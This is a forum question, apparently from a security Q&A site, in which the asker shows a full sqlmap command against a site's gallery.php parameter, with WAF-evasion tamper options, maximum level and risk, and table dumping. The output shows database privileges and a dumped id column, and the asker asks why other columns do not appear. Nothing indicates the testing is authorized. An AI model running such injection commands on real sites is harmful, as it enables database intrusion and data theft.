0

I have accessed a database and using --is-dba , I know that the user IS NOT database admin and also using --privileges , I know that the privileges is USAGE . Now I want to know is this the reason that sqlmap is only dumping the ID column of the table?

current user is DBA: False
[12:57:03] [INFO] fetching database users privileges
[12:57:03] [DEBUG] used SQL query returns 1 entry
[12:57:03] [DEBUG] performed 0 queries in 0.01 seconds
database management system users privileges:
[*] 'ch8yluf9_cms'@'localhost' [1]:
    privilege: USAGE

[12:57:03] [INFO] fetching database names
[12:57:03] [DEBUG] used SQL query returns 2 entries
[12:57:03] [DEBUG] performed 0 queries in 0.02 seconds
available databases [2]:
[*] ch8yluf9_cms
[*] information_schema

Here is the command I'm using :

python sqlmap.py -u 'https://URL.com/gallery.php?id=5' --identify-waf --tamper=between,randomcase,space2comment -v 3 --random-agent --level 5 --risk 3 -D ch8yluf9_cms -T details --dump --batch

The output I'm getting is like :

[57 entries]
+----+
| id |
+----+
| 1  |
| 2  |
| 3  |
| 4  |
| 5  |
| 6  |
| 7  |
| 8  |
| 9  |
| 10 |
| 11 |
| 12 |
| 13 |
| 14 |
| 15 |
| 16 |

For some reason, sqlmap is only getting the ID column of the table. Is this because of lack of permissions? If so, how come it can get all the table names?

schroeder
  • 123,438
  • 55
  • 284
  • 319
Mr Pro
  • 11
  • 1
  • Are you sure there is more in the table? Have you used the other functions in sqlmap to determine the column names and other metadata? – schroeder Oct 11 '20 at 19:49
  • There is only one database for that website and the site has data on it so I'm pretty sure something is wrong here . Every single table is dumping the id column only . Is it because the current user is not DBA and also because it has USAGE privileges? – Mr Pro Oct 12 '20 at 13:12

0 Answers0